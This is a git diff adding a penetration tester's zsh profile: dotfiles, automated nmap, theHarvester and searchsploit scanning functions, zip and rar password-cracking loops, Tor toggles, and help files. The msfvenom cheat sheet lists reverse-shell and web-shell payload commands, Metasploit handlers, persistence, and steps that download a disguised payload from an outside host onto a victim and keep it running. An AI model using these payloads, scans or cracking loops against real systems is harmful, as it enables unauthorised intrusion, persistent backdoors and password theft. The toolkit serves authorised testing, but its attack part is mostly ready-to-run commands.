anti-chaos update, test version

README.md

@@ -1 +1,43 @@
 Penetration Tester's Zsh - functions 4 fast pawn
+
+Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also.
+
+Installing after you have the dependencies: cp profile_files/.* -R ~/
+
+
+Functions
+=========
+
+pawnpls   - Automatically enumerate and start predefined attacks such as brute force.
+            Example for single target: autopawn n0nexi-stent.com
+            Example for multiple targets: autopawn "n0nex-1.com n0nex-2.com"
+
+
+everythingworksornot\? - check if everything works or not for this script
+
+
+chk functions
+=============
+
+chkhttpz  - HTTP response check
+            Example: chkhttpz itsec.lu 443
+
+chkcrt    - SSL certificate dump
+            Example: chkcrt gentoo.org 443
+
+
+cracking functions
+==================
+
+johnzip   - Crack zip files using john
+            Example: johnzip data.zip rockyou.txt
+
+johnrar   - Crack rar files using john
+            Example: johnrar data.rar rockyou.txt
+
+
+help functions
+==============
+
+hlp       - Get help of the hlp command
+hlprnd    - Get random strings (lengths: 8,16,32,64)

README.md~

@@ -0,0 +1,43 @@
+Penetration Tester's Zsh - functions 4 fast pawn
+
+Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also.
+
+Installing after you have the dependencies: cp profile_files/.* -R ~/
+
+
+Functions
+=========
+
+pawnpls   - Automatically enumerate and start predefined attacks such as brute force.
+            Example for single target: autopawn 127.0.0.1
+            Example for multiple targets: autopawn "127.0.0.1 127.0.0.2"
+
+
+everythingworksornot\? - check if everything works or not for this script
+
+
+chk functions
+=============
+
+chkhttpz  - HTTP response check
+            Example: chkhttpz itsec.lu 443
+
+chkcrt    - SSL certificate dump
+            Example: chkcrt gentoo.org 443
+
+
+cracking functions
+==================
+
+johnzip   - Crack zip files using john
+            Example: johnzip data.zip rockyou.txt
+
+johnrar   - Crack rar files using john
+            Example: johnrar data.rar rockyou.txt
+
+
+help functions
+==============
+
+hlp       - Get help of the hlp command
+hlprnd    - Get random strings (lengths: 8,16,32,64)

profile_files/.nanorc

@@ -0,0 +1,6 @@
+set linenumbers
+set brackets ""')>]}"
+set matchbrackets "(<[{)>]}"
+set nohelp
+set mouse
+set smooth

profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt

@@ -0,0 +1,126 @@
+C0nn3ctz msfvenom payload backdoor veil
+
+List payloads
+msfvenom -l
+
+# The script way to make life more simple
+theip=0.0.0.0
+theport=443
+
+
+Binaries and libs
+=================
+
+Linux
+msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf
+msfvenom -p linux/x64/shell/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf
+
+Windows
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe
+msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe  # STAGED, use this with msf
+msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe  # NON-STAGED
+msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll
+msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll
+msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport
+
+Mac
+msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f macho > shell.macho
+
+
+
+Web Payloads
+============
+
+PHP
+msfvenom -p php/meterpreter_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.php
+cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
+
+ASP
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f asp > shell.asp
+
+JSP
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.jsp
+
+WAR
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f war > shell.war
+
+JavaScript
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1 -f js_le
+
+
+
+Scripting Payloads
+==================
+
+Python
+msfvenom -p cmd/unix/reverse_python LHOST=$theip LPORT=$theport -f raw > shell.py
+
+Bash
+msfvenom -p cmd/unix/reverse_bash LHOST=$theip LPORT=$theport -f raw > shell.sh
+
+Perl
+msfvenom -p cmd/unix/reverse_perl LHOST=$theip LPORT=$theport -f raw > shell.pl  # For Linux
+msfvenom -p cmd/windows/reverse_perl=$theip LPORT=$theport -f raw > shell.pl  # For Windows
+
+
+
+Shellcode
+=========
+
+For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
+
+Linux Based Shellcode
+msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f <language>
+
+Windows Based Shellcode
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f <language>
+msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=443 -f c
+msfvenom -p windows/shell/bind_tcp -f perl --smallest  # Default port is 4444 and with --smallest msfvenom tries to make it small 
+
+Mac Based Shellcode
+msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f <language>
+
+
+
+Handler
+=======
+
+Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
+
+use exploit/multi/handler
+set PAYLOAD cmd/windows/powershell_reverse_tcp
+set LHOST 0.0.0.0
+set LPORT 443
+set ExitOnSession false
+exploit -j -z
+
+Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
+
+
+
+Persistence
+===========
+meterpreter > run persistence 
+
+
+
+UUID Payload
+============
+
+# Create payload
+msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=domainzz.com  LPORT=53 PayloadUUIDTracking=true PayloadUUIDName=HAXHAXHAXHAX -f elf > hipchat
+
+# Setup msf listener
+set payload linux/x86/meterpreter/reverse_tcp_uuid
+set payloadUUIDName HAXHAXHAXHAX
+set PayloadUUIDTracking true
+run -j 
+
+# Move to vict
+cat hipchat.elf |ncat --ssl -lvp 53
+nc --ssl domainzz.com 53 > /sbin/lister
+chmod +x /sbin/lister
+
+# crontab alternatively:
+if ps aux|grep /sbin/hipchat |grep -v grep; then sleep 1 ; else /sbin/hipchat ; fi
+

profile_files/.ptz/v3das/network_sniffing_wireshark.txt

@@ -0,0 +1,37 @@
+C0nn3ctz sniffing wireshark network
+
+IP address
+ip.addr == 192.168.1.1
+ip.src == 192.168.1.1
+ip.dst == 192.168.1.1
+
+Show only tcp port 110
+tcp.port eq 110
+
+Show only tcp and udp port 110
+tcp.port eq 110 || udp.port eq 110
+
+Follow TCP stream
+tcp.stream eq 0
+
+Show only TCP
+tcp
+
+Show only ARP
+arp
+
+Show only HTTP
+http
+
+Show only HTTP or ARP
+http||arp
+
+
+HTTP and ip.src
+http&&ip.src==192.168.1.4
+
+HTTP POST
+http:.request.method == "POST"
+
+etc
+(ip.addr==192.168.1.0/24) and (ip.src!=192.168.1.2)and (ip.dst!=192.168.1.4)

profile_files/.vimrc

@@ -0,0 +1,4 @@
+syntax on
+set nu
+set backspace=indent,eol,start
+set tabstop=4 shiftwidth=4 expandtab

profile_files/.zsh/agro_detection_parser.py

@@ -0,0 +1,10 @@
+#!/usr/bin/python2.7
+
+with open('2_ports_and_service_top1000_on_alive_hosts.out') as f:
+    curip=""
+    for curline in f:
+        if "Nmap scan report for " in curline:
+            curip=curline
+            curip=curip[21:]
+        if "open" in curline:
+            print curip.strip('\n') + " " + curline.strip('\n')

profile_files/.zsh/aliases.zsh

@@ -0,0 +1,2 @@
+alias py='python'
+alias pl='perl'

profile_files/.zsh/bindkeys.zsh

@@ -0,0 +1,13 @@
+bindkey "^K"      kill-whole-line
+
+bindkey "${terminfo[khome]}" beginning-of-line
+bindkey "${terminfo[kend]}" end-of-line
+bindkey "\e[3~" delete-char
+
+bindkey -v
+bindkey '^R' history-incremental-search-backward
+bindkey '^T' history-incremental-search-backward
+
+# Jumping with ctrl+arrows
+bindkey "^[[1;5C" forward-word
+bindkey "^[[1;5D" backward-word

profile_files/.zsh/colors.zsh

@@ -0,0 +1,17 @@
+autoload colors; colors
+
+# The variables are wrapped in %{%}. This should be the case for every variable that does not contain space.
+for COLOR in RED GREEN YELLOW BLUE MAGENTA CYAN BLACK WHITE; do
+  eval PR_$COLOR='%{$fg_no_bold[${(L)COLOR}]%}'
+  eval PR_BOLD_$COLOR='%{$fg_bold[${(L)COLOR}]%}'
+done
+
+eval RESET='$reset_color'
+export PR_RED PR_GREEN PR_YELLOW PR_BLUE PR_WHITE PR_BLACK
+export PR_BOLD_RED PR_BOLD_GREEN PR_BOLD_YELLOW PR_BOLD_BLUE 
+export PR_BOLD_WHITE PR_BOLD_BLACK
+
+# Clear LSCOLORS
+unset LSCOLORS
+export CLICOLOR=1
+export LS_COLORS=exfxcxdxbxegedabagacad

profile_files/.zsh/completion.zsh

@@ -0,0 +1,2 @@
+autoload -U compinit && compinit                                                                                        
+zmodload -i zsh/complist

profile_files/.zsh/general_functions.zsh

@@ -0,0 +1,22 @@
+function extract {
+  echo Running extract on $1 ...
+  if [ -f $1 ] ; then
+      case $1 in
+          *.tar.bz2)   tar xjf $1  ;;
+          *.tar.gz)    tar xzf $1  ;;
+          *.bz2)       bunzip2 $1  ;;
+          *.rar)       unrar x $1    ;;
+          *.gz)        gunzip $1   ;;
+          *.tar)       tar xf $1   ;;
+          *.tbz2)      tar xjf $1  ;;
+          *.tgz)       tar xzf $1  ;;
+          *.zip)       unzip $1   ;;
+          *.Z)         uncompress $1  ;;
+          *.7z)        7z x $1  ;;
+          *.xz)        unxz $1  ;;
+          *)        echo "'$1' cannot be extracted via extract()" ;;
+      esac
+  else
+      echo "'$1' is not a valid file"
+  fi
+}

profile_files/.zsh/history.zsh

@@ -0,0 +1 @@
+# Not saving history by default

profile_files/.zsh/pentest_functions.zsh

@@ -0,0 +1,200 @@
+function everythingworksornot"?" {
+    echo "really?"
+}
+
+function ton {
+    . torsocks on
+}
+
+function tof {
+    . torsocks off
+}
+
+
+function chkhttpz {
+    echo "HTTP responses"
+    wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/"
+
+    echo "\nHTTPS responses"
+    wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/"
+}
+
+
+function chkcrt {
+    openssl s_client -showcerts -connect $1:$2
+}
+
+
+function hlp {
+    echo "You can get help from the following topics:"
+    for f in ~/.ptz/v3das/* ; do
+        echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1
+    done
+}
+
+function hlprnd {
+    cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-8};echo;
+    cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo;
+    cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-32};echo;
+    cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-64};echo;
+}
+
+
+function johnzip {
+  if [ $# -ne 2 ]
+    then
+      echo "Usage $0 <zipfile> <wordlist>"
+      return
+  fi
+  
+  echo "Unzip test..."
+  unzip -l $1
+  
+  echo "Cracking...."
+  for i in $(john --wordlist=$2 --rules --stdout)
+    do
+      echo -ne "\rtrying \"$i\" " 
+      unzip -o -P $i $1 >/dev/null 2>&1
+      STATUS=$?
+      if [ $STATUS -eq 0 ]; then
+        echo -e "\nArchive password is: \"$i\""
+        return
+      fi
+    done
+}
+
+
+function johnrar {
+  if [ $# -ne 2 ]
+    then
+      echo "Usage $0 <rarfile> <wordlist>"
+  else
+      rar l $1
+      echo "Cracking...."
+      john --wordlist=$2 --rules --stdout | while read i
+        do
+          echo -ne "\rtrying \"$i\" "
+          rar e -o+ -inul -p$i $1 >/dev/null
+          STATUS=$?
+          if [ $STATUS -eq "0" ]; then
+              echo -e "\nArchive password is: \"$i\""
+              return
+          fi
+        done
+    fi
+}
+
+
+
+function pawnpls {
+  amir00t=$(whoami)
+  if [ "$amir00t" != "root" ]
+    then 
+      echo "pawnpls needs root in order to be effective (eg. for nmap -sS scans)."
+      return
+  fi
+
+  if [ $# -ne 1 ]
+    then
+      echo "Are you sure? You need to specify a target. Be careful. This runs out of tor also, even if you have torsocks ;)"
+      return
+  fi
+
+  # Pass to the scan function, no active attacks, just scanning
+  pawnpls_tof_target=$1
+  dns_enum_tof
+  scan_enum_tof
+  active_attack_tof
+
+}
+
+
+function dns_enum_tof {
+
+    . torsocks off
+
+    dnstarg=($pawnpls_tof_target)
+
+    cdate=$(date +"%Y-%m-%d-%H%M")
+    dettmpfold="~/.ptz/result-scan-$cdate"
+    mkdir -p $sctmpfold
+    cd $sctmpfold
+
+    theharvester -d $pawnpls_tof_target -b all -v > 1_harvester_$pawnpls_tof_target.txt
+    
+}
+
+function scan_enum_tof {
+
+    . torsocks off
+
+    # Variables
+    targetx=($pawnpls_tof_target)  # Space delimited!
+    ports=(21-23,25-26,53,80-81,110-111,113,135,139,143,179,199,443,445,465,514-515,548,554,587,646,993,995,1025-1027,1433,1720,1723,2000-2001,3306,3389,4443,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154,11211)
+    
+    # Initialize directory and naming structure
+    cdate=$(date +"%Y-%m-%d-%H%M")
+    sctmpfold="~/.ptz/result-scan-$cdate"
+    mkdir -p $sctmpfold
+    cd $sctmpfold
+
+    touch scan_history.txt
+
+    echo "---- Starting AgroScanner ----" >> scan_history.txt
+    
+    # Start with standard alive scan and check ports on alive hosts
+    # Get alive hosts
+    echo "Starting alive host enumeration..."
+    echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting alive hosts scan." >> scan_history.txt
+    nmap --randomize-hosts -sn -PS$ports $targetx -oG 1_alive_hosts.out 
+    alive_hosts=$(grep "Status: Up" 1_alive_hosts.out | cut -d' ' -f2 | tr '\r\n' ' ')
+    echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished alive hosts scan. Found hosts: " $alive_hosts >> scan_history.txt
+
+    echo "Starting port scans on alive hosts..."
+    # Port scanning on alive hosts and version detection
+    echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting port scans on alive hosts with top 1000." >> scan_history.txt
+    nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 $targetx > 2_ports_and_service_top1000_on_alive_hosts.out
+    python ~/.zsh/agro_detection_parser.py | sed -n '/ /s/ \+/ /gp' > 3_ip_port_service.out
+    number_open_tcp_ports=$(grep -v "Nmap scan report for" 3_ip_port_service.out |wc -l)  # It lists all ports, even unknown and faster to grep from here for this.
+    echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished port scans on alive hosts with top 1000. Number of open ports: " $number_open_tcp_ports >> scan_history.txt
+    # Run UDP scan on most common ports
+    echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting UDP scans." >> scan_history.txt
+    nmap -sU --top-ports 50 $targetx > 4_udpscan.out
+    number_open_udp_ports=$(grep "open" 4_udpscan.out |wc -l)
+    echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished UDP scans. Number of open UDP ports: " $number_open_udp_ports >> scan_history.txt
+
+    echo "Starting nmap nse vulnerability scanning..."    
+    # Vulnerability scanning
+    echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting simple vulnerbility scans." >> scan_history.txt
+    nmap -n -p 21 --script=ftp-anon.nse $targetx > 5_nmap_script_ftpanon.txt
+    nmap -sU -sS --script smb-enum-* -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt  # There is issue with the * askterisk... should be escaped or something
+    nmap -sS -n -p $ports --script=default,safe,vuln $targetx > 7_nmap_script_default-safe-vuln_scan.txt
+    echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished vulnerability scans. Lists are in the relevant txt files." >> scan_history.txt
+
+    echo $(date +"%Y-%m-%d-%H-%M-%S") " Started scan for automatic searchsploit." >> scan_history.txt
+    # for searchsploit, but nmap should be configured to scan with xml, default is top 1000
+    nmap -sS -sV -sC -O --host-timeout=5m --max-hostgroup=1 -Pn $targetx -oA 8_nmap_for_searchsploit
+    searchsploit -v --nmap 8_nmap_for_searchsploit.xml > 9_searchslpoit_results.txt
+    echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished the searchsploit queries. Outputs are in the relevant files." >> scan_history.txt
+
+}
+
+function active_attack_tof {
+
+    . torsocks off
+
+    cdate=$(date +"%Y-%m-%d-%H%M")
+    aatmpfold="~/.ptz/result-attack-$cdate"
+    mkdir -p $aatmpfold
+    cd $aatmpfold
+
+
+    # Preconfs
+    hydrabruteprotocol=(cvs firebird icq irc ldap nntp oracle-listener oracle-sid pcanywhere pcnfs postgres rdp redis rtsp ssh sip teamspeak vmauthd)
+    usernames="/usr/share/nmap/nselib/data/usernames.lst"
+    passwords="/usr/share/nmap/nselib/data/passwords.lst"
+
+
+
+
+}

profile_files/.zsh/prompt.zsh

@@ -0,0 +1,37 @@
+function git_prompt_info {
+  local ref=$(=git symbolic-ref HEAD 2> /dev/null)
+  local gitst="$(=git status 2> /dev/null)"
+
+  if [[ -f .git/MERGE_HEAD ]]; then
+    if [[ ${gitst} =~ "unmerged" ]]; then
+      gitstatus=" %{$fg[red]%}unmerged%{$reset_color%}"
+    else
+      gitstatus=" %{$fg[green]%}merged%{$reset_color%}"
+    fi
+  elif [[ ${gitst} =~ "Changes to be committed" ]]; then
+    gitstatus=" %{$fg[blue]%}!%{$reset_color%}"
+  elif [[ ${gitst} =~ "use \"git add" ]]; then
+    gitstatus=" %{$fg[red]%}!%{$reset_color%}"
+  elif [[ -n `git checkout HEAD 2> /dev/null | grep ahead` ]]; then
+    gitstatus=" %{$fg[yellow]%}*%{$reset_color%}"
+  else
+    gitstatus=''
+  fi
+
+  if [[ -n $ref ]]; then
+    echo "%{$fg_bold[green]%}/${ref#refs/heads/}%{$reset_color%}$gitstatus"
+  fi
+}
+
+function trso {
+    trsochk=$(/usr/bin/torsocks show|grep libtorsocks.so)
+    if [[ -z $(/usr/bin/torsocks show|grep libtorsocks.so) ]]
+      then
+        trchkres="%{$fg[yellow]%}tof"
+      else
+        trchkres="%{$fg[red]%}ton"
+    fi
+    echo $trchkres
+}
+
+PROMPT='%{$fg[red]%}$(whoami)%{$reset_color%}.ptz $(trso)%{$reset_color%} %~%<< $(git_prompt_info) ${PR_BOLD_WHITE}>%{${reset_color}%} '

profile_files/.zsh/setopt.zsh

@@ -0,0 +1,4 @@
+setopt AUTO_CD
+setopt COMPLETE_IN_WORD
+setopt ALWAYS_TO_END
+setopt PROMPT_SUBST

profile_files/.zshrc

@@ -0,0 +1,14 @@
+source ~/.zsh/colors.zsh
+source ~/.zsh/setopt.zsh
+source ~/.zsh/prompt.zsh
+source ~/.zsh/completion.zsh
+source ~/.zsh/aliases.zsh
+source ~/.zsh/bindkeys.zsh
+source ~/.zsh/functions.zsh
+source ~/.zsh/general_functions.zsh
+source ~/.zsh/pentest_functions.zsh
+source ~/.zsh/history.zsh
+
+zstyle ':completion:*' menu select
+
+. torsocks on